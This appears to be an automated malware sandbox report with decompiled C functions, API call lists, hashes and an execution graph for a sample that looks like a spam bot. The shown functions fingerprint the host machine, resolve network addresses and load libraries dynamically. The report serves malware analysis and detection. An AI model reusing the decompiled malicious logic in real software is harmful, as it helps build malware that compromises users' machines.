                                                                                                                                  • Instruction ID: 2e4882fff751b5905bcc38bfa2cd4d67bf9c642b42fdf425c00f27fbfd993b21
                                                                                                                                  • Opcode Fuzzy Hash: e4aff9389b963f63373f6495f6f2d31144d691977fa3f05a849364ed3536fcbf
                                                                                                                                  • Instruction Fuzzy Hash: 3A313A72A00209EFDB24DF58D984BAA77F4EB44315F12847AE802F7680D374EE64CB65
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 004038F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E004038F0(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _t29;
				intOrPtr _t43;
				intOrPtr _t45;
				intOrPtr _t50;

				if(_a8 <= 0) {
					L14:
					return _t29;
				}
				_t29 = E004030FA(0x412c00);
				_v8 = 0;
				if(_a8 <= 0) {
					L13:
					 *0x412c00 =  *0x412c00 & 0x00000000;
					goto L14;
				} else {
					do {
						_t50 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + _v8 * 4))));
						_t45 =  *((intOrPtr*)(_t50 - 0x24));
						if( *((intOrPtr*)(_t50 - 0x14)) != GetCurrentThreadId()) {
							_t10 = _t50 - 0x1c;
							 *_t10 =  *(_t50 - 0x1c) - 1;
							if( *_t10 < 0) {
								 *(_t50 - 0x1c) =  *(_t50 - 0x1c) & 0x00000000;
							}
							 *((intOrPtr*)(_t50 - 0x14)) = GetCurrentThreadId();
						}
						 *((intOrPtr*)(_t50 - 0xc)) =  *((intOrPtr*)(_t50 - 0xc)) + 1;
						if( *((intOrPtr*)(_t50 - 0xc)) >=  *((intOrPtr*)(_t50 - 8))) {
							_t43 = 2;
							 *((intOrPtr*)(_t50 - 0x20)) = _t43;
							 *((intOrPtr*)(_t45 + 0x10)) =  *((intOrPtr*)(_t45 + 0x10)) + 1;
							_t34 =  *((intOrPtr*)(_t45 + 0x10));
							if( *((intOrPtr*)(_t45 + 0x10)) >=  *((intOrPtr*)(_t45 + 0x14))) {
								 *((intOrPtr*)(_t45 + 8)) = _t43;
								if( *0x412bfc == 0) {
									E00406509(_t34);
									 *0x412bfc = 1;
								}
							}
						}
						_v8 = _v8 + 1;
						_t29 = _v8;
					} while (_t29 < _a8);
					goto L13;
				}
			}








                                                                                                                                  0x004038fa
                                                                                                                                  0x00403989
                                                                                                                                  0x0040398b
                                                                                                                                  0x0040398b
                                                                                                                                  0x00403905
                                                                                                                                  0x0040390b
                                                                                                                                  0x00403911
                                                                                                                                  0x00403982
                                                                                                                                  0x00403982
                                                                                                                                  0x00000000
                                                                                                                                  0x00403913
                                                                                                                                  0x0040391b
                                                                                                                                  0x00403924
                                                                                                                                  0x00403926
                                                                                                                                  0x0040392e
                                                                                                                                  0x00403930
                                                                                                                                  0x00403930
                                                                                                                                  0x00403933
                                                                                                                                  0x00403935
                                                                                                                                  0x00403935
                                                                                                                                  0x0040393b
                                                                                                                                  0x0040393b
                                                                                                                                  0x0040393e
                                                                                                                                  0x00403947
                                                                                                                                  0x0040394b
                                                                                                                                  0x0040394c
                                                                                                                                  0x0040394f
                                                                                                                                  0x00403952
                                                                                                                                  0x00403958
                                                                                                                                  0x0040395a
                                                                                                                                  0x00403964
                                                                                                                                  0x00403966
                                                                                                                                  0x0040396b
                                                                                                                                  0x0040396b
                                                                                                                                  0x00403964
                                                                                                                                  0x00403958
                                                                                                                                  0x00403975
                                                                                                                                  0x00403978
                                                                                                                                  0x0040397b
                                                                                                                                  0x00000000
                                                                                                                                  0x00403981

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 004030FA: GetTickCount.KERNEL32 ref: 00403103
                                                                                                                                    • Part of subcall function 004030FA: InterlockedExchange.KERNEL32(?,00000001), ref: 00403128
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00403929
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00403939
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentThread$CountExchangeInterlockedTick
                                                                                                                                  • String ID: %FROM_EMAIL
                                                                                                                                  • API String ID: 3716169038-2903620461
                                                                                                                                  • Opcode ID: ef9999c53fb079ee60b66104ed5eee9301c2c40c50ee899f7204c173007e787c
                                                                                                                                  • Instruction ID: b7f4056d5a805f6dc72f55654bcd4db07a73235d6c8b9c95532e416c15eafef7
                                                                                                                                  • Opcode Fuzzy Hash: ef9999c53fb079ee60b66104ed5eee9301c2c40c50ee899f7204c173007e787c
                                                                                                                                  • Instruction Fuzzy Hash: 7B113DB5900214EFD720DF16D581A5DF7F8FB05716F11856EE844A7291C7B8AB80CFA8
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00401B71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 60%
                                                                                                                                  			E00401B71() {
				long _v8;
				long _v12;
				void* _v27;
				char _v28;
				signed int _t12;
				signed int _t28;

				_v28 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_v8 = 0;
				asm("stosb");
				_v12 = 0xf;
				_t12 = E00401AC3();
				GetComputerNameA( &_v28,  &_v12);
				GetVolumeInformationA(0, 0, 4,  &_v8, 0, 0, 0, 0);
				_t28 = (_v28 ^ _v8 ^ _t12) & 0x7fffffff;
				_v8 = _t28;
				if(_t28 == 0) {
					return E0040ECA5() & 0x7fffffff;
				}
				return _t28;
			}









                                                                                                                                  0x00401b7e
                                                                                                                                  0x00401b84
                                                                                                                                  0x00401b85
                                                                                                                                  0x00401b86
                                                                                                                                  0x00401b87
                                                                                                                                  0x00401b89
                                                                                                                                  0x00401b8c
                                                                                                                                  0x00401b8d
                                                                                                                                  0x00401b94
                                                                                                                                  0x00401ba3
                                                                                                                                  0x00401bb8
                                                                                                                                  0x00401bc8
                                                                                                                                  0x00401bca
                                                                                                                                  0x00401bcd
                                                                                                                                  0x00000000
                                                                                                                                  0x00401bd8
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00401AC3: LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00401AD4
                                                                                                                                    • Part of subcall function 00401AC3: GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 00401AE9
                                                                                                                                  • GetComputerNameA.KERNEL32 ref: 00401BA3
                                                                                                                                  • GetVolumeInformationA.KERNEL32(00000000,00000000,00000004,00401EFD,00000000,00000000,00000000,00000000), ref: 00401BB8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressComputerInformationLibraryLoadNameProcVolume
                                                                                                                                  • String ID: localcfg
                                                                                                                                  • API String ID: 2777991786-1857712256
                                                                                                                                  • Opcode ID: 347cd581b463f90e4869c942ce5ddbd7b1215e33c70616b3ab33c256474cc11e
                                                                                                                                  • Instruction ID: 3328142983dde5627d9ce9a8d7cd594e0c2b91da8c15a082e229c164244e8f4a
                                                                                                                                  • Opcode Fuzzy Hash: 347cd581b463f90e4869c942ce5ddbd7b1215e33c70616b3ab33c256474cc11e
                                                                                                                                  • Instruction Fuzzy Hash: BE018BB2D0010CBFEB009BE9CC819EFFABCAB48754F150072A601F3190E6746E084AA1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0040AB81 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E0040AB81(intOrPtr _a4, intOrPtr _a8, char _a12, CHAR* _a16, char _a20) {
				void* _t15;
				long _t17;
				signed int _t29;
				long* _t31;

				_t29 = 0;
				if(_a8 > 0) {
					do {
						_t31 = _a4 + _t29 * 4;
						_t17 =  *_t31;
						if( *((char*)(_t17 + 0x10)) == 1 &&  *((char*)(_t17 + 0x12)) == 0) {
							 *((char*)(_t17 + 0x11)) = _a20;
							lstrcpynA( *_t31 + 0x12, _a16, 0x3e);
							 *((char*)( *_t31 + 0x4f)) = 0;
							 *((char*)( *_t31 + 0x10)) = _a12;
							if( *((char*)( *_t31 + 0x10)) != 2) {
								_t17 = InterlockedIncrement(0x413640);
							} else {
								_t17 = InterlockedIncrement(0x41363c);
							}
						}
						_t29 = _t29 + 1;
					} while (_t29 < _a8);
					return _t17;
				}
				return _t15;
			}







                                                                                                                                  0x0040ab85
                                                                                                                                  0x0040ab8a
                                                                                                                                  0x0040ab94
                                                                                                                                  0x0040ab97
                                                                                                                                  0x0040ab9a
                                                                                                                                  0x0040aba0
                                                                                                                                  0x0040abab
                                                                                                                                  0x0040abb9
                                                                                                                                  0x0040abc4
                                                                                                                                  0x0040abca
                                                                                                                                  0x0040abd3
                                                                                                                                  0x0040abe1
                                                                                                                                  0x0040abd5
                                                                                                                                  0x0040abe1
                                                                                                                                  0x0040abe1
                                                                                                                                  0x0040abe1
                                                                                                                                  0x0040abe3
                                                                                                                                  0x0040abe4
                                                                                                                                  0x00000000
                                                                                                                                  0x0040abea
                                                                                                                                  0x0040abed

                                                                                                                                  APIs
                                                                                                                                  • lstrcpynA.KERNEL32(?,?,0000003E,?,%FROM_EMAIL,00000000,?,0040BD6F,?,?,0000000B,no locks and using MX is disabled,000000FF), ref: 0040ABB9
                                                                                                                                  • InterlockedIncrement.KERNEL32(00413640), ref: 0040ABE1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: IncrementInterlockedlstrcpyn
                                                                                                                                  • String ID: %FROM_EMAIL
                                                                                                                                  • API String ID: 224340156-2903620461
                                                                                                                                  • Opcode ID: 85a21fda7c2203b6c3b9fe5e6af0625d6c65905c1dc9d9bdca14f106badbca83
                                                                                                                                  • Instruction ID: 7c747491fd5973eaabf4003e0d871bd0eed893c7530145efd7f06e2bf3dfd35d
                                                                                                                                  • Opcode Fuzzy Hash: 85a21fda7c2203b6c3b9fe5e6af0625d6c65905c1dc9d9bdca14f106badbca83
                                                                                                                                  • Instruction Fuzzy Hash: D3019231508384AFDB21CF18D881F967FA5AF15314F1444A6F6805B393C3B9E995CB96
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 004026B2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • gethostbyaddr.WS2_32(00000000,00000004,00000002), ref: 004026C3
                                                                                                                                  • inet_ntoa.WS2_32(?), ref: 004026E4
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: gethostbyaddrinet_ntoa
                                                                                                                                  • String ID: localcfg
                                                                                                                                  • API String ID: 2112563974-1857712256
                                                                                                                                  • Opcode ID: d53564beee30921141880bc566d8d3609085812ca2ea79526dfe3cb7d65e7849
                                                                                                                                  • Instruction ID: d2c247fa2f64166219b22d1ecfca1b9a377bc480b126e4bf322f1ec8134a793b
                                                                                                                                  • Opcode Fuzzy Hash: d53564beee30921141880bc566d8d3609085812ca2ea79526dfe3cb7d65e7849
                                                                                                                                  • Instruction Fuzzy Hash: 81F082321482097BEF006FA1ED09A9A379CEF09354F108876FA08EA0D0DBB5D950979C
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00402684 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • inet_addr.WS2_32(00000001), ref: 00402693
                                                                                                                                  • gethostbyname.WS2_32(00000001), ref: 0040269F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: gethostbynameinet_addr
                                                                                                                                  • String ID: time_cfg
                                                                                                                                  • API String ID: 1594361348-2401304539
                                                                                                                                  • Opcode ID: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
                                                                                                                                  • Instruction ID: 506fadec158220b53989f58c32679351ed61dc8f5455c60e8cf87b9af1828998
                                                                                                                                  • Opcode Fuzzy Hash: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
                                                                                                                                  • Instruction Fuzzy Hash: 9CE08C302040219FCB108B28F848AC637A4AF06330F0189A2F840E32E0C7B89CC08688
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0040EAE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E0040EAE4(CHAR* _a4) {
				struct HINSTANCE__* _t2;

				_t2 =  *0x4136f4; // 0x0
				if(_t2 != 0) {
					L3:
					return GetProcAddress(_t2, _a4);
				} else {
					_t2 = LoadLibraryA("ntdll.dll");
					 *0x4136f4 = _t2;
					if(_t2 != 0) {
						goto L3;
					} else {
						return _t2;
					}
				}
			}




                                                                                                                                  0x0040eae4
                                                                                                                                  0x0040eaeb
                                                                                                                                  0x0040eb02
                                                                                                                                  0x0040eb0d
                                                                                                                                  0x0040eaed
                                                                                                                                  0x0040eaf2
                                                                                                                                  0x0040eaf8
                                                                                                                                  0x0040eaff
                                                                                                                                  0x00000000
                                                                                                                                  0x0040eb01
                                                                                                                                  0x0040eb01
                                                                                                                                  0x0040eb01
                                                                                                                                  0x0040eaff

                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(ntdll.dll,0040EB54,_alldiv,0040F0B7,80000001,00000000,00989680,00000000,?,?,?,0040E342,00000000,745CF210,80000001,00000000), ref: 0040EAF2
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040EB07
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: ntdll.dll
                                                                                                                                  • API String ID: 2574300362-2227199552
                                                                                                                                  • Opcode ID: b4eb004c93ce830f66033c1bec013b2cb76b73adf8dbcf645c2d99c100687d31
                                                                                                                                  • Instruction ID: 7b5812d5d2c037db56fb7cc720bc5ad28be2e092f3141d28ea6626f847aa1f88
                                                                                                                                  • Opcode Fuzzy Hash: b4eb004c93ce830f66033c1bec013b2cb76b73adf8dbcf645c2d99c100687d31
                                                                                                                                  • Instruction Fuzzy Hash: D0D0C934600302ABCF22CF65AE1EA867AACAB54702B40C436B406E1670E778E994DA0C
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00402F22 Relevance: 5.2, APIs: 4, Instructions: 157memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00402F22(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v8;
				void* _v12;
				char _v368;
				void* _t64;
				signed short* _t66;
				intOrPtr* _t67;
				intOrPtr* _t72;
				intOrPtr* _t76;
				intOrPtr* _t82;
				short _t86;
				intOrPtr* _t87;
				signed int _t94;
				intOrPtr _t96;
				signed int _t99;
				short* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				intOrPtr _t109;
				intOrPtr _t110;
				intOrPtr _t111;
				intOrPtr _t114;
				void* _t115;
				intOrPtr* _t116;
				void* _t117;
				signed int _t118;
				void* _t121;
				void* _t122;
				void* _t123;
				void* _t124;

				_t116 = _a12;
				_t94 = 0;
				 *_t116 = 0;
				_t117 = E00402D21(_a4);
				if(_t117 != 0) {
					if( *_t117 != 0) {
						_v12 = _t117;
						_a12 = _a8;
						while(_t94 < 5) {
							_t9 = _t117 + 8; // 0x8
							_t104 = _t9;
							_t82 = _t9;
							_t10 = _t82 + 1; // 0x9
							_v8 = _t10;
							do {
								_t114 =  *_t82;
								_t82 = _t82 + 1;
							} while (_t114 != 0);
							E0040EE08(_a12, _t104, _t82 - _v8 + 1);
							_t86 =  *((intOrPtr*)(_t117 + 4));
							_a12 = _a12 + 0x100;
							_t122 = _t122 + 0xc;
							 *_t116 =  *_t116 + 1;
							_t117 =  *_t117;
							 *((short*)(_t121 + _t94 * 2 - 0x6c)) = _t86;
							_t94 = _t94 + 1;
							if(_t117 != 0) {
								continue;
							}
							break;
						}
						HeapFree(GetProcessHeap(), 0, _v12);
						_v8 = _v8 & 0x00000000;
						if( *_t116 == 1) {
							L24:
							return 1;
						}
						_t64 =  *_t116 - 1;
						_a12 = _a8;
						do {
							_t118 = _v8;
							_t99 = _t118;
							if(_t118 >=  *_t116 - 1) {
								L17:
								_t66 = _t121 + _v8 * 2 - 0x6c;
								_t100 = _t121 + _t118 * 2 - 0x6c;
								 *_t66 =  *_t100;
								_t67 = _a12;
								 *_t100 =  *_t66 & 0x0000ffff;
								_t101 = _t67 + 1;
								do {
									_t109 =  *_t67;
									_t67 = _t67 + 1;
								} while (_t109 != 0);
								E0040EE08( &_v368, _a12, _t67 - _t101 + 1);
								_t123 = _t122 + 0xc;
								_t120 = (_t118 << 8) + _a8;
								_t72 = (_t118 << 8) + _a8;
								_t102 = _t72 + 1;
								do {
									_t110 =  *_t72;
									_t72 = _t72 + 1;
								} while (_t110 != 0);
								E0040EE08(_a12, _t120, _t72 - _t102 + 1);
								_t76 =  &_v368;
								_t124 = _t123 + 0xc;
								_t103 = _t76 + 1;
								do {
									_t111 =  *_t76;
									_t76 = _t76 + 1;
								} while (_t111 != 0);
								goto L23;
							} else {
								goto L14;
							}
							do {
								L14:
								if( *((intOrPtr*)(_t121 + _t99 * 2 - 0x6a)) <  *((intOrPtr*)(_t121 + _t99 * 2 - 0x6c))) {
									_t32 = _t99 + 1; // 0x1
									_t118 = _t32;
								}
								_t99 = _t99 + 1;
							} while (_t99 < _t64);
							goto L17;
							L23:
							E0040EE08(_t120,  &_v368, _t76 - _t103 + 1);
							_a12 = _a12 + 0x100;
							_t122 = _t124 + 0xc;
							_v8 = _v8 + 1;
							_t64 =  *_t116 - 1;
						} while (_v8 < _t64);
						goto L24;
					}
					_t3 = _t117 + 8; // 0x8
					_t105 = _t3;
					_t87 = _t3;
					_t4 = _t87 + 1; // 0x9
					_t115 = _t4;
					do {
						_t96 =  *_t87;
						_t87 = _t87 + 1;
					} while (_t96 != 0);
					E0040EE08(_a8, _t105, _t87 - _t115 + 1);
					 *_t116 =  *_t116 + 1;
					HeapFree(GetProcessHeap(), 0, _t117);
					goto L24;
				}
				return 0;
			}

































                                                                                                                                  0x00402f2e
                                                                                                                                  0x00402f34
                                                                                                                                  0x00402f36
                                                                                                                                  0x00402f3d
                                                                                                                                  0x00402f42
                                                                                                                                  0x00402f4d
                                                                                                                                  0x00402f88
                                                                                                                                  0x00402f8b
                                                                                                                                  0x00402f8e
                                                                                                                                  0x00402f93
                                                                                                                                  0x00402f93
                                                                                                                                  0x00402f96
                                                                                                                                  0x00402f98
                                                                                                                                  0x00402f9b
                                                                                                                                  0x00402f9e
                                                                                                                                  0x00402f9e
                                                                                                                                  0x00402fa0
                                                                                                                                  0x00402fa1
                                                                                                                                  0x00402fae
                                                                                                                                  0x00402fb3
                                                                                                                                  0x00402fb7
                                                                                                                                  0x00402fbe
                                                                                                                                  0x00402fc1
                                                                                                                                  0x00402fc3
                                                                                                                                  0x00402fc5
                                                                                                                                  0x00402fca
                                                                                                                                  0x00402fcd
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00402fcd
                                                                                                                                  0x00402fdb
                                                                                                                                  0x00402fe3
                                                                                                                                  0x00402fe8
                                                                                                                                  0x004030ad
                                                                                                                                  0x00000000
                                                                                                                                  0x004030af
                                                                                                                                  0x00402ff3
                                                                                                                                  0x00402ff4
                                                                                                                                  0x00402ff7
                                                                                                                                  0x00402ff9
                                                                                                                                  0x00402ffd
                                                                                                                                  0x00403001
                                                                                                                                  0x00403017
                                                                                                                                  0x0040301a
                                                                                                                                  0x00403021
                                                                                                                                  0x00403028
                                                                                                                                  0x0040302b
                                                                                                                                  0x0040302e
                                                                                                                                  0x00403031
                                                                                                                                  0x00403034
                                                                                                                                  0x00403034
                                                                                                                                  0x00403036
                                                                                                                                  0x00403037
                                                                                                                                  0x00403049
                                                                                                                                  0x00403051
                                                                                                                                  0x00403054
                                                                                                                                  0x00403057
                                                                                                                                  0x00403059
                                                                                                                                  0x0040305c
                                                                                                                                  0x0040305c
                                                                                                                                  0x0040305e
                                                                                                                                  0x0040305f
                                                                                                                                  0x0040306b
                                                                                                                                  0x00403070
                                                                                                                                  0x00403076
                                                                                                                                  0x00403079
                                                                                                                                  0x0040307c
                                                                                                                                  0x0040307c
                                                                                                                                  0x0040307e
                                                                                                                                  0x0040307f
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00403003
                                                                                                                                  0x00403003
                                                                                                                                  0x0040300d
                                                                                                                                  0x0040300f
                                                                                                                                  0x0040300f
                                                                                                                                  0x0040300f
                                                                                                                                  0x00403012
                                                                                                                                  0x00403013
                                                                                                                                  0x00000000
                                                                                                                                  0x00403083
                                                                                                                                  0x0040308f
                                                                                                                                  0x00403094
                                                                                                                                  0x0040309d
                                                                                                                                  0x004030a0
                                                                                                                                  0x004030a3
                                                                                                                                  0x004030a4
                                                                                                                                  0x00000000
                                                                                                                                  0x00402ff7
                                                                                                                                  0x00402f4f
                                                                                                                                  0x00402f4f
                                                                                                                                  0x00402f52
                                                                                                                                  0x00402f54
                                                                                                                                  0x00402f54
                                                                                                                                  0x00402f57
                                                                                                                                  0x00402f57
                                                                                                                                  0x00402f59
                                                                                                                                  0x00402f5a
                                                                                                                                  0x00402f66
                                                                                                                                  0x00402f6e
                                                                                                                                  0x00402f7a
                                                                                                                                  0x00000000
                                                                                                                                  0x00402f7a
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00402D21: GetModuleHandleA.KERNEL32(00000000,7620EA30,?,00000000,00402F01,?,004020FF,00412000), ref: 00402D3A
                                                                                                                                    • Part of subcall function 00402D21: LoadLibraryA.KERNEL32(?), ref: 00402D4A
                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402F73
                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 00402F7A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$FreeHandleLibraryLoadModuleProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1017166417-0
                                                                                                                                  • Opcode ID: 3f77e5f90a98cb00e4cd81c42479f24e3707705fbe302646911da8b0c8861fdf
                                                                                                                                  • Instruction ID: 68d3b74a61d8da24685d2c7d21854d87d7e5c343c8b3ec1e3967b08f84d9f298
                                                                                                                                  • Opcode Fuzzy Hash: 3f77e5f90a98cb00e4cd81c42479f24e3707705fbe302646911da8b0c8861fdf
                                                                                                                                  • Instruction Fuzzy Hash: C251E23190020A9FCF01DF64D8889FABB79FF15304F10457AEC95E7290E7769A19CB88
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:14.6%
                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                  Signature Coverage:0.7%
                                                                                                                                  Total number of Nodes:1784
                                                                                                                                  Total number of Limit Nodes:17
                                                                                                                                  execution_graph 7893 2518c51 7894 2518c86 7893->7894 7895 2518c5d 7893->7895 7896 2518c8b lstrcmpA 7894->7896 7906 2518c7b 7894->7906 7898 2518c7d 7895->7898 7899 2518c6e 7895->7899 7897 2518c9e 7896->7897 7896->7906 7900 2518cad 7897->7900 7903 251ec2e codecvt 4 API calls 7897->7903 7915 2518bb3 7898->7915 7907 2518be7 7899->7907 7905 251ebcc 4 API calls 7900->7905 7900->7906 7903->7900 7905->7906 7908 2518bf2 7907->7908 7914 2518c2a 7907->7914 7909 2518bb3 6 API calls 7908->7909 7910 2518bf8 7909->7910 7919 2516410 7910->7919 7912 2518c01 7912->7914 7934 2516246 7912->7934 7914->7906 7916 2518bbc 7915->7916 7918 2518be4 7915->7918 7917 2516246 6 API calls 7916->7917 7916->7918 7917->7918 7920 2516421 7919->7920 7921 251641e 7919->7921 7922 251643a 7920->7922 7923 251643e VirtualAlloc 7920->7923 7921->7912 7922->7912 7924 2516472 7923->7924 7925 251645b VirtualAlloc 7923->7925 7926 251ebcc 4 API calls 7924->7926 7925->7924 7927 25164fb 7925->7927 7928 2516479 7926->7928 7927->7912 7928->7927 7944 2516069 7928->7944 7931 2516246 6 API calls 7931->7927 7933 25164da 7933->7927 7933->7931 7935 2516252 7934->7935 7943 25162b3 7934->7943 7938 251628f 7935->7938 7941 2516281 FreeLibrary 7935->7941 7942 2516297 7935->7942 7936 25162a0 VirtualFree 7937 25162ad 7936->7937 7940 251ec2e codecvt 4 API calls 7937->7940 7939 251ec2e codecvt 4 API calls 7938->7939 7939->7942 7940->7943 7941->7935 7942->7936 7942->7937 7943->7914 7945 2516090 IsBadReadPtr 7944->7945 7947 2516089 7944->7947 7945->7947 7950 25160aa 7945->7950 7946 25160c0 LoadLibraryA 7946->7947 7946->7950 7947->7933 7954 2515f3f 7947->7954 7948 251ebcc 4 API calls 7948->7950 7949 251ebed 8 API calls 7949->7950 7950->7946 7950->7947 7950->7948 7950->7949 7951 2516191 IsBadReadPtr 7950->7951 7952 2516141 GetProcAddress 7950->7952 7953 2516155 GetProcAddress 7950->7953 7951->7947 7951->7950 7952->7950 7953->7950 7955 2515fe6 7954->7955 7957 2515f61 7954->7957 7955->7933 7956 2515fbf VirtualProtect 7956->7955 7956->7957 7957->7955 7957->7956 8040 2516511 wsprintfA IsBadReadPtr 8041 251656a htonl htonl wsprintfA wsprintfA 8040->8041 8042 251674e 8040->8042 8043 25165f3 8041->8043 8044 251e318 23 API calls 8042->8044 8046 251668a GetCurrentProcess StackWalk64 8043->8046 8047 25166a0 wsprintfA 8043->8047 8049 2516652 wsprintfA 8043->8049 8045 2516753 ExitProcess 8044->8045 8046->8043 8046->8047 8048 25166ba 8047->8048 8050 2516712 wsprintfA 8048->8050 8051 25166da wsprintfA 8048->8051 8052 25166ed wsprintfA 8048->8052 8049->8043 8053 251e8a1 30 API calls 8050->8053 8051->8052 8052->8048 8054 2516739 8053->8054 8055 251e318 23 API calls 8054->8055 8056 2516741 8055->8056 7958 2515453 7963 251543a 7958->7963 7966 2515048 7963->7966 7967 2514bd1 4 API calls 7966->7967 7970 2515056 7967->7970 7968 251508b 7969 251ec2e codecvt 4 API calls 7969->7968 7970->7968 7970->7969 7971 2514ed3 7976 2514c9a 7971->7976 7977 2514cd8 7976->7977 7979 2514ca9 7976->7979 7978 251ec2e codecvt 4 API calls 7978->7977 7979->7978 8057 2515d93 IsBadWritePtr 8058 2515ddc 8057->8058 8060 2515da8 8057->8060 8060->8058 8061 2515389 8060->8061 8062 2514bd1 4 API calls 8061->8062 8063 25153a5 8062->8063 8064 2514ae6 8 API calls 8063->8064 8067 25153ad 8064->8067 8065 2515407 8065->8058 8066 2514ae6 8 API calls 